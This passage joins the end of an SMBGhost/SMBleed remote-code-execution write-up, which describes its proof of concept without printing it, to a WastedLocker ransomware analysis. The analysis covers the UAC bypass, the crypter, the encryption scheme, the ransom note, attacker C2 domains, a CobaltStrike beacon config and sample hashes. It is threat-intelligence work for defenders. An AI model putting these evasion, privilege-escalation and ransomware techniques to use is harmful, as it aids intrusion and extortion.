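The table can be modeled as a mapping keyed by logical processor and list size. The sketch below is only an illustration: the list sizes come from the table, but the rule of picking the smallest list that fits the request is an assumption made for the example, and the function name is hypothetical.

```python
# The nine list sizes from the table: 0x1100, 0x2100, ..., 0x100100.
LOOKASIDE_SIZES = [0x100 + (0x1000 << i) for i in range(9)]


def lookaside_cell(processor: int, allocation_size: int):
    """Return the (processor, list size) cell assumed to serve an allocation.

    Assumption: the smallest list that fits the request is used. Requests larger
    than the biggest list are not served from a lookaside list (None).
    """
    for list_size in LOOKASIDE_SIZES:
        if allocation_size <= list_size:
            return (processor, list_size)
    return None
```

Two allocations share a buffer only if they land in the same cell, i.e. both the processor and the list size match.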

With more than one logical processor, things are a bit more complicated – we get the same buffer only as long as the allocation is made on the same logical processor. Our first attempt at overcoming this limitation was redundancy. When writing to one of the lookaside list buffers, write multiple times. When reading from one of the lookaside list buffers, read multiple times and choose the most common value. This approach would work if the logical processor usage was distributed evenly, but we found that it’s not the case. We tested our POC in VirtualBox, and from our observations, some logical processors are preferred over others. For a setup of 4 logical cores, here’s the distribution of handling the incoming packet in a test execution:

Logical processor      Incoming packets handled
Logical processor 1    0.2%
Logical processor 2    0.8%
Logical processor 3    7.9%
Logical processor 4    91.1%

Here’s the distribution of handling the decompression:

Logical processor      Decompressions executed
Logical processor 1    13.3%
Logical processor 2    5.1%
Logical processor 3    6.8%
Logical processor 4    74.8%

As you can see, in this specific case logical processor 4 did most of the work. Logical processor 1 handled only 1 out of every 500 incoming packets!

We tweaked the POC such that it sends several packets simultaneously from multiple threads to improve the logical processor usage distribution. We also added error detection, so that if the data that is read doesn’t make sense, another reading attempt is made instead of proceeding and most likely crashing the system. The changes we made were enough to make the POC work with VirtualBox targets with multiple logical processors, but from a quick test the POC doesn’t work with VMware targets or (at least some) physical computers with multiple logical processors. We didn’t try to improve the POC further to support all targets, which we believe can be achieved with a better strategy for ordering the reads and writes.
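
The redundancy and error detection ideas described in this section can be sketched as a majority vote with a sanity check. This is a simplified illustration, not the logic of the POC: the function names, the minimum vote count and the validity test (a canonical kernel-space address, with bits 47 to 63 all set) are assumptions chosen for the example.

```python
from collections import Counter


def looks_like_kernel_pointer(value: int) -> bool:
    """Canonical x64 kernel addresses have bits 47..63 all set."""
    return (value >> 47) == 0x1FFFF


def pick_value(reads, is_valid=looks_like_kernel_pointer, min_votes=2):
    """Return the most common plausible value, or None if another attempt is needed."""
    valid = [value for value in reads if is_valid(value)]
    if not valid:
        return None
    value, votes = Counter(valid).most_common(1)[0]
    return value if votes >= min_votes else None
```

Returning None instead of a best guess lets the caller retry the read rather than continue with data that would most likely crash the target.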

Our POC with the improvements can be found in the GitHub repository.

If you’d like to study the code, we suggest starting with the initial, less noisy version which was designed for a single logical processor. It can be found in a previous commit here.

ZecOps Detection

ZecOps classifies forensic logs related to this issue as #SMBGhost and #SMBleed. You can find more information on how to use ZecOps solutions for endpoints and servers, mobile devices, or applications. Besides SMBleed / SMBGhost, ZecOps Crash Forensics solutions can find other, previously unknown vulnerabilities that are exploited in the wild. If you care about persistent threats – we’ll be happy to assist.

Remediation

You can remediate the impact of both issues by doing one of the following:

  • Applying the latest security updates (recommended)
  • Blocking port 445 / enforcing host isolation
  • Disabling SMBv3.1.1 compression

Summary

This is the third and final part of the writeup, in which we used the findings from the previous parts to achieve RCE using SMBGhost and SMBleed. We hope you enjoyed the read. Here’s a recap of the milestones during our research on the SMB bugs:

  1. A write-what-where primitive, demonstrated in our previous research about achieving local privilege escalation.
  2. The discovery of the SMBleed bug, described in the first part of the writeup.
  3. An ability to read memory from the pool buffers allocated by the SrvNetAllocateBuffer function, demonstrated in Part II: Unauthenticated Memory Read – Preparing the Ground for an RCE.
  4. An ability to get the base address of the srvnet.sys module.
  5. An ability to call an arbitrary function.
  6. Arbitrary memory read.
  7. Shellcode execution.

WastedLocker: A New Ransomware Variant Developed By The Evil Corp Group

By: nccsante
23 June 2020 at 12:25

Authors: Nikolaos Pantazopoulos, Stefano Antenucci (@Antelox), Michael Sandee, in close collaboration with NCC’s RIFT.

About the Research and Intelligence Fusion Team (RIFT):
RIFT leverages our strategic analysis, data science, and threat hunting capabilities to create actionable threat intelligence, ranging from IOCs and detection capabilities to strategic reports on tomorrow’s threat landscape. Cyber security is an arms race where both attackers and defenders continually update and improve their tools and ways of working. To ensure that our managed services remain effective against the latest threats, NCC Group operates a Global Fusion Center with Fox-IT at its core. This multidisciplinary team converts our leading cyber threat intelligence into powerful detection strategies.

1. Introduction

WastedLocker is a new ransomware locker we’ve detected being used since May 2020. We believe it has been in development for a number of months prior to this and was started in conjunction with a number of other changes we have seen originate from the Evil Corp group in 2020. Evil Corp were previously associated with the Dridex malware and BitPaymer ransomware; the latter came to prominence in the first half of 2017. Recently Evil Corp has changed a number of TTPs related to their operations, as further described in this article. We believe those changes were ultimately caused by the unsealing of indictments against Igor Olegovich Turashev and Maksim Viktorovich Yakubets, and the financial sanctions against Evil Corp in December 2019. These legal events set in motion a chain of events to disconnect the association of the current Evil Corp group and these two specific indicted individuals and the historic actions of Evil Corp.

2. Attribution and Actor Background

We have tracked the activities of the Evil Corp group for many years, and even though the group has changed its composition since 2011, we have been able to keep track of the group’s activities under this name.

2.1 Actor Tracking

Business associations are fairly fluid in organised cybercrime groups. Partnerships and affiliations are formed and dissolved much more frequently than in nation state sponsored groups, for example. Nation state backed groups often remain operational in similar form over longer periods of time. For this reason, cyber threat intelligence reporting can be misleading, given the difficulty of maintaining assessments of the capabilities of cybercriminal groups which are accurate and current.

As an example, the Anunak group (also known as FIN7 and Carbanak) has changed composition quite frequently. As a result, the public reporting on FIN7 and Carbanak and their various associations in various open and closed source threat feeds can distort the current reality. The Anunak or FIN7 group has worked closely with Evil Corp, and also with the group publicly referred to as TA505. Hence, TA505 activity is sometimes still reported as Evil Corp activity, even though these groups have not worked together since the second half of 2017.


It can also be difficult to accurately attribute responsibility for a piece of malware or a wave of infection because commodity malware is typically sold to interested parties for mass distribution, or supplied to associates who have experience in monetising access to a specific type of business, such as financial institutions. Similarly, it is easy for confusion to arise around the many financially oriented organised crime groups which are tracked publicly. Access to victim organisations is traded as a commodity between criminal actors and so business links often exist which are not necessarily related to the day to day operations of a group.

2.2 Evil Corp

Nevertheless, despite these difficulties, we feel that we can assert the following with high confidence, due to our in depth tracking of this group as it posed a significant threat to our clients. Evil Corp has been operating the Dridex malware since July 2014 and provided access to several groups and individual threat actors. However, towards the end of 2017 Evil Corp became smaller and used Dridex infections almost exclusively for targeted ransomware campaigns by deploying BitPaymer. The majority of victims were in North America (mainly USA) with a smaller number in Western Europe and instances outside of these regions being just scattered, individual cases. During 2018, Evil Corp had a short lived partnership with TheTrick group; specifically, leasing out access to BitPaymer for a while, prior to their use of Ryuk.

In 2019 a fork of BitPaymer usually referred to as DoppelPaymer appeared, although this was ransomware as a service and thus was not the same business model. We have observed some cooperation between the two groups, but as yet can draw no definitive conclusions as to the current relationship between these two threat actor groups.


After the unsealing of indictments by the US Department of Justice and actions against Evil Corp as a group by the US Treasury Department, we detected a short period of inactivity from Evil Corp until January 2020. However, since January 2020 activity has resumed as usual, with victims appearing in the same regions as before. It is possible, however, that this was primarily a strategic move to suggest to the public that Evil Corp was still active as, from around the middle of March 2020, we failed to observe much activity from them in terms of BitPaymer deployments. Of course, this period coincided with the lockdowns due to the COVID19 pandemic.


The development of new malware takes time and it is probable that they had already started the development of new techniques and malware. Early indications that this work was underway included the use of a variant of Gozi we refer to as Gozi ISFB 2 variant. It is thought that this variant is intended as a replacement for Dridex botnet 501 as one of the persistent components on a target network. Similarly, a customized version of the CobaltStrike loader has been observed, possibly intended as a replacement for the Empire PowerShell framework previously used.


The group has access to highly skilled exploit and software developers capable of bypassing network defences on all different levels. The group seems to put a lot of effort into bypassing endpoint protection products; this observation is based on the fact that when a certain version of their malware is detected on victim networks the group is back with an undetected version and able to continue after just a short time. This shows the importance of victims fully understanding each incident that happens. That is, detection or blocking of a single element from the more advanced criminal actors does not mean they have been defeated.

The lengths to which Evil Corp goes in order to bypass endpoint protection tools are demonstrated by the fact that they abused a victim’s email so they could pose as a legitimate potential client to a vendor and request a trial license for a popular endpoint protection product that is not commonly available.

It appears the group regularly finds innovative but practical approaches to bypass detection in victim networks based on their practical experience gained throughout the years. They also demonstrate patience and persistence. In one case, they successfully compromised a target over 6 months after their initial failure to obtain privileged access. They also display attention to detail by, for example, ensuring that they obtain the passwords to disable security tools on a network prior to deploying the ransomware.

2.3 WastedLocker


The new WastedLocker ransomware appeared in May 2020 (a technical description is included below). The ransomware name is derived from the filename it creates which includes an abbreviation of the victim’s name and the string ‘wasted’. The abbreviation of the victim’s name was also seen in BitPaymer, although a larger portion of the organisation name was used in BitPaymer and individual letters were sometimes replaced by similar looking numbers.

Technically, WastedLocker does not have much in common with BitPaymer, apart from the fact that it appears that victim specific elements are added using a specific builder rather than at compile time, which is similar to BitPaymer. Some similarities were also noted in the ransom note generated by the two pieces of malware. The first WastedLocker example we found contained the victim name as in BitPaymer ransom notes and also included both a protonmail.com and tutanota.com email address. Later versions also contained other Protonmail and Tutanota email domains, as well as Eclipso and Airmail email addresses. Interestingly the user parts of the email addresses listed in the ransom messages are numeric (usually 5 digit numbers) which is similar to the 6 to 12 digit numbers seen used by BitPaymer in 2018.

Evil Corp are selective in terms of the infrastructure they target when deploying their ransomware. Typically, they hit file servers, database services, virtual machines and cloud environments. Of course, these choices will also be heavily influenced by what we may term their ‘business model’ – which also means they should be able to disable or disrupt backup applications and related infrastructure. This increases the time for recovery for the victim, or in some cases due to unavailability of offline or offsite backups, prevents the ability to recover at all.


It is interesting that the group does not appear to have engaged in extensive information stealing or threatened to publish information about victims in the way that DoppelPaymer and many other targeted ransomware operations have. We assess that the probable reason for not leaking victim information is the unwanted attention this would draw from law enforcement and the public.

3. Distribution

While many things have changed in the TTPs of Evil Corp recently, one very notable element has not changed: the distribution via the SocGholish fake update framework. This framework is still in use, although it is now used to directly distribute a custom CobaltStrike loader, described in 4.1, rather than Dridex as in past years. One of the more notable features of this framework is the evaluation of whether a compromised victim system is part of a larger network, as a sole end-user system is of no use to the attackers. The SocGholish JavaScript bot has access to information from the system itself as it runs under the privileges of the browser user. The bot collects a large set of information and sends that to the SocGholish server side which, in turn, returns a payload to the victim system. Other methods of distribution also appear to still be in use, but we have not been able to independently verify this at the time of writing.

4. Technical Analysis

4.1 CobaltStrike payloads

The CobaltStrike payloads are embedded inside two types of PowerShell scripts. The first type (which targets Windows 64-bit only) decodes a base64 payload twice and then decrypts it using the AES algorithm in CBC mode. The AES key is derived by computing the SHA256 hash of the hard-coded string ‘saN9s9pNlD5nJ2EyEd4rPym68griTOMT’ and the initialisation vector (IV) is derived from the first 16 bytes of the twice base64-decoded payload. The script converts the decrypted payload (a base64-encoded string) to bytes and allocates memory before executing it.
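
For analysts who want to reproduce the key and IV derivation described above, a minimal sketch using only the Python standard library could look as follows. The function name is hypothetical, the string is assumed to be hashed as ASCII bytes, and the sketch deliberately stops before the AES-CBC step: it does not assume whether the ciphertext includes or follows the 16 IV bytes, since the description above does not say.

```python
import base64
import hashlib

HARDCODED_STRING = "saN9s9pNlD5nJ2EyEd4rPym68griTOMT"


def derive_key_and_iv(encoded_payload: bytes):
    """Return (key, iv, decoded) for a twice base64-encoded payload."""
    decoded = base64.b64decode(base64.b64decode(encoded_payload))
    if len(decoded) < 16:
        raise ValueError("payload too short to contain a 16-byte IV")
    # Assumption: the hard-coded string is hashed as ASCII bytes.
    key = hashlib.sha256(HARDCODED_STRING.encode("ascii")).digest()
    iv = decoded[:16]
    return key, iv, decoded
```

The resulting 32-byte key and 16-byte IV can then be passed to any AES-256-CBC implementation to decrypt a sample in an analysis environment.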

The second type is simpler and includes two embedded base64-encoded payloads, an injector and a loader for the CobaltStrike payload. It appears that both the injector and the loader are part of the ‘Donut’ project [3].

An interesting behaviour can be spotted in the CobaltStrike payloads that are delivered from the second type of PowerShell scripts. In these, the loader has been modified with the purpose of detecting CrowdStrike software (Figure 1). If the C:\Program Files\CrowdStrike directory exists, then the ‘FreeConsole’ Windows API is called after loading the CobaltStrike payload. Otherwise, the ‘FreeConsole’ function is called before loading the CobaltStrike beacon. It is assumed that this is an attempt to bypass CrowdStrike’s endpoint solution, although it is still unclear if this is the case.

Figure 1: Decompilation showing CrowdStrike specific detection logic

4.2 The Crypter

WastedLocker is protected with a custom crypter, referred to as CryptOne by Fox-IT InTELL. On examination, the code turned out to be very basic and is also used by other malware families such as Netwalker, Gozi ISFB v3, ZLoader and Smokeloader.

The crypter mainly contains junk code to increase entropy of the sample and hide the actual code. We have found 2 crypter variants with some code differences, but mostly with the same logic applied.

The first action performed by the crypter code is to check some specific registry key. In the variants analysed the registry key is either: interface\{b196b287-bab4-101a-b69c-00aa00341d07} or interface\{aa5b6a80-b834-11d0-932f-00a0c90dcaa9}. These keys relate to the UCOMIEnumConnections Interface and the IActiveScriptParseProcedure32 interface respectively. If the key is not detected, the crypter will enter an infinite loop or exit, thus it is used as an anti-analysis technique.

In the next step the crypter allocates a memory buffer calling the VirtualAlloc API. A while loop is used to join a series of data blobs into the allocated buffer, and the contents of this buffer are then decrypted with an XOR based algorithm. Once decrypted, the crypter jumps into the data blob which turns out to be a shellcode responsible for decrypting the actual payload. The shellcode copies the encrypted payload into another buffer allocated by calling the VirtualAlloc API, and then decrypts this with an XOR based algorithm in a similar way to that described above. To execute the payload, the shellcode replaces the crypter’s code in memory with the code of the payload just decrypted, and jumps to its entry point.
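
As a rough illustration of the unpacking flow described above, the sketch below joins a series of data blobs into one buffer and applies a repeating-key XOR. The actual XOR-based algorithm and key handling used by the crypter are not specified here, so the repeating key and the function name are placeholders chosen for the example, not a description of CryptOne itself.

```python
from itertools import cycle


def join_and_xor(blobs, key: bytes) -> bytes:
    """Concatenate the blobs and XOR the result with a repeating key.

    The repeating-key scheme is a stand-in for the crypter's XOR-based algorithm.
    """
    if not key:
        raise ValueError("key must not be empty")
    joined = b"".join(blobs)
    return bytes(data_byte ^ key_byte for data_byte, key_byte in zip(joined, cycle(key)))
```

Because XOR is its own inverse, the same routine both encrypts and decrypts, which is convenient when writing a static unpacker for samples of this kind.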

As noted above, we have observed this crypter being used by other malware families as well. Related information and IOCs can be found in the Appendix.

4.3 WastedLocker Ransomware

WastedLocker aims to encrypt the files of the infected host. However, before the encryption procedure runs, WastedLocker performs a few other tasks to ensure the ransomware will run properly.

First, WastedLocker decrypts the strings which are stored in the .bss section and then calculates a DWORD value that is used later for locating decrypted strings that are related to the encryption process. This is described in more detail in the Strings Encryption section. In addition, the ransomware creates a log file lck.log and then sets an exception handler that creates a crash dump file in the Windows temporary folder with the filename being the ransomware’s binary filename.

If the ransomware is not executed with administrator rights or if the infected host runs Windows Vista or later, it will attempt to elevate its privileges. In short, WastedLocker uses a well-documented UAC bypass method [1] [2]. It chooses a random file (EXE/DLL) from the Windows system32 folder and copies it to the %APPDATA% location under a different hidden filename. Next, it creates an alternate data stream (ADS) named bin in that file and copies the ransomware into it. WastedLocker then copies winsat.exe and winmm.dll into a newly created folder located in the Windows temporary folder. Once loaded, the hijacked DLL (winmm.dll) is patched to execute the aforementioned ADS.

The ransomware supports the following command line parameters (Table 1):

Parameter Purpose
-r i. Delete shadow copies
ii. Copy the ransomware binary file to %windir%\system32 and take ownership of it (takeown.exe /F filepath) and reset the ACL permissions
iii. Create and run a service. The service is deleted once the encryption process is completed.
-s Execute service’s entry
-p directory_path Encrypt files in a specified directory and then proceed with the rest of the files in the drive
-f directory_path Encrypt files in a specified directory
Table 1 – WastedLocker command line parameters

It is also worth noting that if either of the first two parameters (-r and -s) fails, the ransomware proceeds with the encryption but applies the following registry modifications in the registry key Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap:

Name Modification
ProxyBypass Deletes this key
IntranetName Deletes this key
UNCAsIntranet Sets this key to 0
AutoDetect Sets this key to 1
Table 2 – Registry keys

The above modifications apply to both 32-bit and 64-bit systems and are possibly made to ensure that the ransomware can access remote drives. However, the architecture identification code contains a bug. The ransomware authors use a well-known method to identify the operating system architecture. The ransomware reads the memory address 0x7FFE0300 (KUSER_SHARED_DATA) and checks if the pointer is zero. If it is, then the 32-bit process of the ransomware is running in a Windows 64-bit host (Figure 2). The issue is that this does not work on Windows 10 systems.

Figure 2: Decompilation showing method used to identify operating system architecture

Additionally, WastedLocker chooses a random name from a generated name list in order to generate filenames or service names. The ransomware creates this list by reading the registry keys stored in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control and then splits their names wherever a capital letter is found. For example, the registry key AppReadiness will be split into two words, App and Readiness.
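The splitting rule can be illustrated with a short Python sketch. This is only an illustration of the described behaviour, not the ransomware's code: the function name is hypothetical, and how the original handles runs of consecutive capitals or leading lowercase text is not stated in the analysis, so the choices below are assumptions.

```python
import re

def split_on_capitals(key_name):
    """Split a registry key name into words, starting a new word at each capital letter."""
    # Each match is either a capital followed by non-capitals, or a leading
    # run of non-capitals (assumed behaviour for names that start lowercase).
    return re.findall(r"[A-Z][^A-Z]*|[^A-Z]+", key_name)

print(split_on_capitals("AppReadiness"))  # ['App', 'Readiness']
```

A defender could use the same rule to generate the candidate word list from a reference Windows installation when hunting for suspicious service names.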

4.4 Strings Encryption

The strings pertaining to the ransomware are encrypted and stored in the .bss section of the binary file. This includes the ransom note along with other important information necessary for the ransomware’s tasks. The strings are decrypted using a key that combines the size and raw address of the .bss section, as well as the ransomware’s compilation timestamp.

The code’s authors use an interesting method to locate the encrypted strings related to the encryption process. To locate one of them, the ransomware calculates a checksum that is looked up in the encrypted strings table. The checksum is derived from both a constant value that is unique to each string and a fixed value, which are bitwise XORed. The encrypted strings table consists of one struct per string, as shown below.

struct ransomware_string
{
    WORD  total_size;      // string_length + checksum + ransom_string
    WORD  string_length;
    DWORD Checksum;        // value matched during the lookup
    BYTE  ransom_string[]; // string_length bytes
};
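As a rough illustration of how an analyst might walk such a table once the .bss section has been decrypted, the following Python sketch parses back-to-back entries and performs the XOR-based lookup. It assumes a packed, little-endian layout with entries stored contiguously; the helper names, the fixed value and the demo constants are hypothetical and not taken from any sample.

```python
import struct

# Assumed layout: packed, little-endian WORD, WORD, DWORD header.
HEADER = struct.Struct("<HHI")

def parse_string_table(blob):
    """Map each Checksum to the bytes of its string."""
    table = {}
    offset = 0
    while offset + HEADER.size <= len(blob):
        _total_size, string_length, checksum = HEADER.unpack_from(blob, offset)
        start = offset + HEADER.size
        end = start + string_length
        if end > len(blob):
            break  # truncated entry, stop parsing
        table[checksum] = bytes(blob[start:end])
        offset = end  # assumption: the next entry follows immediately
    return table

def find_string(table, string_constant, fixed_value):
    """Look up a string by XORing its per-string constant with the fixed value."""
    return table.get((string_constant ^ fixed_value) & 0xFFFFFFFF)

def make_entry(checksum, data):
    """Build one demo entry (total_size assumed to cover the header and the data)."""
    return HEADER.pack(HEADER.size + len(data), len(data), checksum) + data

FIXED_VALUE = 0x11223344  # hypothetical fixed value, for the demo only
demo = (make_entry(0xAAAA0001 ^ FIXED_VALUE, b"first")
        + make_entry(0xAAAA0002 ^ FIXED_VALUE, b"second"))
table = parse_string_table(demo)
print(find_string(table, 0xAAAA0002, FIXED_VALUE))
```

The sketch ignores total_size when advancing and relies on string_length instead, since the exact meaning of total_size is only hinted at by the struct comment.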

4.5 Encryption Process

The encryption process is quite straightforward. The ransomware targets the following drive types:

  • Removable
  • Fixed
  • Shared
  • Remote

Instead of including a list of extension targets, WastedLocker includes a list of directories and extensions to exclude from the encryption process. Files smaller than 10 bytes are also ignored, and large files are encrypted in blocks of 64MB.

Once a drive is found, the ransomware starts searching for and encrypting files. Each file is encrypted using the AES algorithm with a newly generated AES key and IV (256-bit in CBC mode) for each file. The AES key and IV are encrypted with an embedded public RSA key (4096 bits). The RSA encrypted output of key material is converted to base64 and then stored into the ransom note.

For each encrypted file, the ransomware creates an additional file that includes the ransomware note. The encrypted file’s extension is set according to the targeted organisation’s name along with the suffix wasted (hence the name we have given to this ransomware). For example, test.txt.orgnamewasted (encrypted data) and test.txt.orgnamewasted_info (ransomware note). The ransomware note and the list of excluded directories and extensions are available in the Appendix. Finally, once the encryption of each file has been completed, the ransomware updates the log file with the following information:

  • Number of targeted files
  • Number of files which were encrypted
  • Number of files which were not encrypted due to access rights issues

4.6 WastedLocker Decrypter

During our analysis, we managed to identify a decrypter for WastedLocker. The decrypter requires administrator privileges and, similarly to the encryption process, reports the number of files which were successfully decrypted (Figure 3).

Figure 3: Command line output of the decrypter of WastedLocker

References

  1. hxxps://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e
  2. hxxps://github.com/hfiref0x/UACME
  3. hxxps://github.com/TheWover/donut/

Appendix

Ransom note

*ORGANIZATION_NAME*

YOUR NETWORK IS ENCRYPTED NOW

USE *EMAIL1* | *EMAIL2* TO GET THE PRICE FOR YOUR DATA

DO NOT GIVE THIS EMAIL TO 3RD PARTIES

DO NOT RENAME OR MOVE THE FILE

THE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:
[begin_key]*[end_key]
KEEP IT

Excluded extensions (in addition to orgnamewasted and orgnamewasted_info)

*\ntldr
*.386
*.adv
*.ani
*.bak
*.bat
*.bin
*.cab
*.cmd
*.com
*.cpl
*.cur
*.dat
*.diagcab
*.diagcfg
*.dll
*.drv
*.exe
*.hlp
*.hta
*.icl
*.icns
*.ics
*.idx
*.ini
*.key
*.lnk
*.mod
*.msc
*.msi
*.msp
*.msstyles
*.msu
*.nls
*.nomedia
*.ocx
*.ps1
*.rom
*.rtp
*.scr
*.sdi
*.shs
*.sys
*.theme
*.themepack
*.wim
*.wpx
*\bootmgr
*\grldr

Excluded directories

*\$recycle.bin*
*\appdata*
*\bin*
*\boot*
*\caches*
*\dev*
*\etc*
*\initdr*
*\lib*
*\programdata*
*\run*
*\sbin*
*\sys*
*\system volume information*
*\users\all users*
*\var*
*\vmlinuz*
*\webcache*
*\windowsapps*
c:\program files (x86)*
c:\program files*
c:\programdata*
c:\recovery*
c:\users\ %USERNAME%\appdata\local\temp*
c:\users\ %USERNAME%\appdata\roaming*
c:\windows*

IoCs

IoCs are a generally misunderstood concept in the case of targeted ransomware. Each ransomware victim has a custom build configured or compiled for them, so knowing the specific hashes used against historic victims does not provide any protection at all. Even if behavioural patterns of the ransomware or network related indicators of the ransomware stage are given (should they exist), it is arguable whether detection of the attack at that stage would allow prevention of the actual attack. We do include known ransomware hashes here; however, please note that these are for RESEARCH PURPOSES ONLY. Blocking files based on these file attributes in any endpoint protection product will not provide any value.


At Fox-IT we focus mainly on detection of the initial stages of such attacks (such as the initial stage of infection) by detecting the various methods of infection delivery as well as the lateral movement stage which typically involves scanning, exploitation and/or credential dumping. Providing these IoCs to the wider public would, however, be counterproductive as the threat actors would simply change these methods or work around the indicators. However, we have included some of them to provide historical as well as current protection or detection against this particular threat, and provide a better understanding of this threat actor. It is also hoped this information will help other organisations to conduct further research into this particular threat.

CobaltStrike
This particular set of domains is used as C&C by the group for CobaltStrike lateral movement activity, using a custom loader. Note that in 2020 the group has completely switched to using CobaltStrike and is no longer using the Empire PowerShell framework, as it is no longer being updated by the original creators.

CobaltStrike C&C Domains

adsmarketart.com
advancedanalysis.be
advertstv.com
amazingdonutco.com
cofeedback.com
consultane.com
dns.proactiveads.be
mwebsoft.com
rostraffic.com
traffichi.com
typiconsult.com
websitelistbuilder.com

CobaltStrike Beacon config

SETTING_PROTOCOL: short: 8 (DNS: 0, SSL: 1)
SETTING_PORT: short: 443
SETTING_SLEEPTIME: int: 45000
SETTING_MAXGET: int: 1403644
SETTING_JITTER: short: 37
SETTING_MAXDNS: short: 255
SETTING_PUBKEY: ''
SETTING_PUBKEY SHA256: 14f2890a18656e4e766aded0a2267ad1c08a9db11e0e5df34054f6d8de749fe7
ptr SETTING_DOMAINS: websitelistbuilder.com,/jquery-3.3.1.min.js
ptr SETTING_USERAGENT: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
ptr SETTING_SUBMITURI: /jquery-3.3.2.min.js
SETTINGS_C2_RECOVER:
    print: True
    append: 1522
    prepend: 84
    prepend: 3931
    base64url: True
    mask: True
SETTING_C2_REQUEST (transform steps):
   _HEADER: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
   _HEADER: Referer: http://code.jquery.com/
   _HEADER: Accept-Encoding: gzip, deflate
   BUILD: metadata
   BASE64URL: True
   PREPEND: __cfduid=
   HEADER: Cookie
SETTING_C2_POSTTREQ (transform steps):
   _HEADER: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
   _HEADER: Referer: http://code.jquery.com/
   _HEADER: Accept-Encoding: gzip, deflate
   BUILD: metadata
   MASK: True
   BASE64URL: True
   PARAMETER: __cfduid
   BUILD: output
   MASK: True
   BASE64URL: True
   PRINT: True
ptr DEPRECATED_SETTING_SPAWNTO: 
ptr SETTING_SPAWNTO_X86: %windir%\syswow64\rundll32.exe
ptr SETTING_SPAWNTO_X64: %windir%\sysnative\rundll32.exe
ptr SETTING_PIPENAME: 
SETTING_CRYPTO_SCHEME: short: 0 (CRYPTO_LICENSED_PRODUCT)
SETTING_DNS_IDLE: int: 1249756273
SETTING_DNS_SLEEP: int: 0
ptr SETTING_C2_VERB_GET: GET
ptr SETTING_C2_VERB_POST: POST
SETTING_C2_CHUNK_POST: int: 0
SETTING_WATERMARK: int: 305419896 (0x12345678)
SETTING_CLEANUP: short: 1
SETTING_CFG_CAUTION: short: 0
ptr SETTING_HOST_HEADER: 
SETTING_HTTP_NO_COOKIES: short: 1
SETTING_PROXY_BEHAVIOR: short: 2
SETTING_EXIT_FUNK: short: 0
SETTING_KILLDATE: int: 0
SETTING_GARGLE_NOOK: int: 154122
ptr SETTING_GARGLE_SECTIONS: '`\x02\x00Q\xfd\x02\x00\x00\x00\x03\x00\xc0\xa0\x03\x00\x00\xb0\x03\x000\xce\x03'
SETTING_PROCINJ_PERMS_I: short: 4
SETTING_PROCINJ_PERMS: short: 32
SETTING_PROCINJ_MINALLOC: int: 17500
ptr SETTING_PROCINJ_TRANSFORM_X86: '\x02\x90\x90'
ptr SETTING_PROCINJ_TRANSFORM_X64: '\x02\x90\x90'
ptr SETTING_PROCINJ_STUB: *p?'??7???]
ptr SETTING_PROCINJ_EXECUTE: BntdllRtlUserThreadStart
SETTING_PROCINJ_ALLOCATOR: short: 1
Deduced metadata:
 WANTDNS: False
 SSL: True
 MAX ENUM: 55
 Version: CobaltStrike v4.0 (Dec 5, 2019)

Custom CobaltStrike loader samples (sha256 hashes):

2f72550c99a297558235caa97d025054f70a276283998d9686c282612ebdbea0
389f2000a22e839ddafb28d9cf522b0b71e303e0ae89e5fc2cd5b53ae9256848
3dfb4e7ca12b7176a0cf12edce288b26a970339e6529a0b2dad7114bba0e16c3
714e0ed61b0ae779af573dce32cbc4d70d23ca6cfe117b63f53ed3627d121feb
810576224c148d673f47409a34bd8c7f743295d536f6d8e95f22ac278852a45f
83710bbb9d8d1cf68b425f52f2fb29d5ebbbd05952b60fb3f09e609dfcf1976c
91e18e5e048b39dfc8d250ae54471249d59c637e7a85981ab0c81cf5a4b8482d
adabf8c1798432b766260ac42ccdd78e0a4712384618a2fc2e3695ff975b0246
b0354649de6183d455a454956c008eb4dec093141af5866cc9ba7b314789844d
bc1c5fecadc752001826b736810713a86cfa64979b3420ab63fe97ba7407f068
c781c56d8c8daedbed9a15fb2ece165b96fdda1a85d3beeba6bb3bc23e917c90
c7cde31daa7f5d0923f9c7591378b4992765eac12efa75c1baaaefa5f6bdb2b6
f093b0006ef5ac52aa1d51fee705aa3b7b10a6af2acb4019b7bc16da4cabb5a1

.NET injector (Donut) (sha256 hash):

6088e7131b1b146a8e573c096386ff36b19bfad74c881ca68eda29bd4cea3339

Gozi ISFB v2
This particular set contains C&C domains, bot version, Group ID, RSA key and Serpent encryption keys for 2 Gozi variants used for persistence in victim networks during 2020.

Gozi C&C Domains

bettyware.xyz
celebratering.xyz
fakeframes.xyz
gadgetops.xyz
hotphonecall.xyz
justbesarnia.xyz
kordelservers.xyz
tritravlife.xyz
veisllc.xyz
wineguroo.xyz

Gozi versions

217119
217123

Gozi Group ID

30000

Gozi RSA key

00020000BEA9877343AD9F6EA8E122A5A540C071E96AB5E0C8D73991BFACB8D7867125966C60153EB1315F07FD8B276D7A45A5404642CC9D1F79357452BB84EDAA7CE21300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010001

Gozi serpent network encryption keys:

8EzkwaSgkg565AyQ
eptDZELKvZUseoAH
GbdG3H7PgSVEme2r
RQ5btM2UfoCHAMKN

Gozi samples (sha256 hashes)

5706e1b595a9b7397ff923223a6bc4e4359e7b1292eaed5e4517adc65208b94b
ba71ddcab00697f42ccc7fc67c7a4fccb92f6b06ad02593a972d3beb8c01f723
c20292af49b1f51fac1de7fd4b5408ed053e3ebfcb4f0566a2d4e7fafadde757
cf744b04076cd5ee456c956d95235b68c2ec3e2f221329c45eac96f97974720a

WastedLocker samples (sha256 hashes)

5cd04805f9753ca08b82e88c27bf5426d1d356bb26b281885573051048911367
887aac61771af200f7e58bf0d02cb96d9befa11deda4e448f0a700ccb186ce9d
8897db876553f942b2eb4005f8475a232bafb82a50ca7761a621842e894a3d80
bcdac1a2b67e2b47f8129814dca3bcf7d55404757eb09f1c3103f57da3153ec8
e3bf41de3a7edf556d43b6196652aa036e48a602bb3f7c98af9dae992222a8eb
ed0632acb266a4ec3f51dd803c8025bccd654e53c64eb613e203c590897079b3

The following IoCs are specifically related to the crypter used by Evil Corp, which we refer to as CryptOne. Given that CryptOne is used by more malware families and variations than just those related to Evil Corp, it is likely that CryptOne is a third party service.

